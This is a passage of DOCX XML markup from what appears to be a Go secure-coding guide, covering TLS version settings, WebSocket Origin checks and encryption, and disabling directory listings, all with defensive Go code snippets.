          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">config := &amp;tls.Config{ServerName: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"yourHostname"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>Another known attack against TLS to be aware of is called POODLE. It is related to TLS connection fallback when the client does not support the server's cypher. This allows the connection to be downgraded to a vulnerable cypher.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>By default, Go disables SSLv3, and the cypher's minimum version and maximum version can be set with the following configurations:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// MinVersion contains the minimum SSL/TLS version that is acceptable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// If zero, then TLS 1.0 is taken as the minimum.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
  MinVersion </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">uint16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">// MaxVersion contains the maximum SSL/TLS version that is acceptable.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// If zero, then the maximum version supported by this package is used,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">// which is currently TLS 1.2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
MaxVersion </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">uint16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The safety of the used cyphers can be checked with </w:t>
      </w:r>
      <w:hyperlink r:id="rId88" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>SSL Labs</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An additional flag that is commonly used to mitigate downgrade attacks is the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>TLS_FALLBACK_SCSV</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as defined in </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>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2"/>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2"/>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08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">w.Header().Set(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Content-Type"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Desired Content Type; charset=utf-8"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)
</w:t>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9409176" cy="6135624"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="HTTP Header Leak" id="9" name="InsecureHeader.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="HTTP Header Leak" id="0" name="InsecureHeader.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="9409176" cy="6135624"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Image Credits : </w:t>
      </w:r>
      <w:hyperlink r:id="rId90" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>John Mitchell</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="64" w:name="WEBSOCKETS"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>WEBSOCKETS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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0"/>
        </w:rPr>
        <w:t>long polling</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text0"/>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65" w:name="Origin_Header"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Origin Header</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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2"/>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2"/>
        </w:rPr>
        <w:t>Origin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> header check, which prevents attackers from performing CSWSH (Cross-Site WebSocket Hijacking).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="10890504" cy="2898648"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="HTTP Header Leak" id="10" name="w1_1.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="HTTP Header Leak" id="0" name="w1_1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10890504" cy="2898648"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application should validate the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Origin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to make sure the request's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Origin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the trusted </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r>
        <w:t>, rejecting the connection if not.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>A simple check is demonstrated in the following snippet:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 05"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">//Compare our origin with Host and act accordingly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> r.Header.Get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Origin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">) != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"http://"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">+r.Host {
  http.Error(w, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"Origin not allowed"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">403</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">)
    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
} </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text14"/>
        </w:rPr>
        <w:t xml:space="preserve">else</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    websocket.Handler(EchoHandler).ServeHTTP(w, r)
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="66" w:name="Confidentiality_and_Integrity"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Confidentiality and Integrity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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2"/>
        </w:rPr>
        <w:t>ws://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and its default port is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. If using TLS WebSockets, the URI scheme is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>wss://</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and the default port is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>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inline>
            <wp:extent cx="10808208" cy="2267712"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="HTTP Cookie Leak" id="11" name="w2_1.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="HTTP Cookie Leak" id="0" name="w2_1.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="10808208" cy="2267712"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>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inline>
            <wp:extent cx="14502384" cy="2962656"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="HTTP Cookie TLS" id="12" name="ws_tls_upgrade.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="HTTP Cookie TLS" id="0" name="ws_tls_upgrade.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="14502384" cy="2962656"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>In the latter example, our connection upgrade request is using SSL, as well as our WebSocket:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="14502384" cy="1417320"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Websocket SSL" id="13" name="wss_secure.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Websocket SSL" id="0" name="wss_secure.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="14502384" cy="1417320"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="67" w:name="Authentication_and_Authorization"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Authentication and Authorization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6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tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Authentication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index5_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Access Control</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> parts of this document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="68" w:name="Input_Sanitization"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Input Sanitization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">As with any data originating from untrusted sources, the data should be properly sanitized and encoded. For a more detailed coverage of these topics, see the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_sanitization_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Sanitization</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> and the </w:t>
      </w:r>
      <w:hyperlink w:anchor="Top_of_index2_html" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Output Encoding</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> parts of this document.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 23"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t/>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="69" w:name="System_Configuration"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 1"/>
      </w:pPr>
      <w:r>
        <w:t>System Configuration</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>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8"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">req, _ := http.NewRequest(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"POST"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, url, buffer)
req.Proto = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"HTTP/1.0"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:hyperlink r:id="rId91" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Proto</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> will be ignored and the request will be made using HTTP/1.1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="70" w:name="Directory_listings"/>
      <w:pPr>
        <w:keepNext/>
        <w:pStyle w:val="Heading 2"/>
        <w:pageBreakBefore w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t>Directory listings</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If a developer forgets to disable directory listings (OWASP also calls it </w:t>
      </w:r>
      <w:hyperlink r:id="rId92" w:tooltip="">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Text1"/>
          </w:rPr>
          <w:t>Directory Indexing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>), an attacker could check for sensitive files navigating through directories.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>If you run a Go web server application, you should also be careful with this:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">http.ListenAndServe(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">":8080"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, http.FileServer(http.Dir(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"/tmp/static"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)))
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If you call </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>localhost:8080</w:t>
      </w:r>
      <w:r>
        <w:t>, it will open your index.html. But imagine that you have a test directory that has a sensitive file inside. What happen next?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="1810512" cy="676656"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="password file is shown" id="14" name="index_file.png"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="password file is shown" id="0" name="index_file.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1810512" cy="676656"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Why does this happen? Go tries to find an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>index.html</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inside the directory, and if it doesn't exist, it will show the directory listing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t>To fix this, you have three possible solutions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Disable directory listings in your web application</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:pStyle w:val="Para 01"/>
      </w:pPr>
      <w:r>
        <w:t>Restrict access to unnecessary directories and files</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>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7"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">type</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> justFilesFilesystem </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">struct</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
    fs http.FileSystem
}
</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> (fs justFilesFilesystem) Open(name </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">) (http.File, error) {
    f, err := fs.fs.Open(name)
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> err != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> {
        </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">, err
    }
    </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve"> neuteredReaddirFile{f}, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text12"/>
        </w:rPr>
        <w:t xml:space="preserve">nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text11"/>
        </w:rPr>
        <w:t xml:space="preserve">
}
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Then we simply use it in our </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text2"/>
        </w:rPr>
        <w:t>http.ListenAndServe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as follows:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Para 08"/>
        <w:keepLines w:val="on"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text8"/>
        </w:rPr>
        <w:t xml:space="preserve">fs := justFilesFilesystem{http.Dir(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"tmp/static/"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)}
http.ListenAndServe(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">":8080"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, http.StripPrefix(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Text13"/>
        </w:rPr>
        <w:t xml:space="preserve">"/tmp/static"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, http.FileServer(fs)))
</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
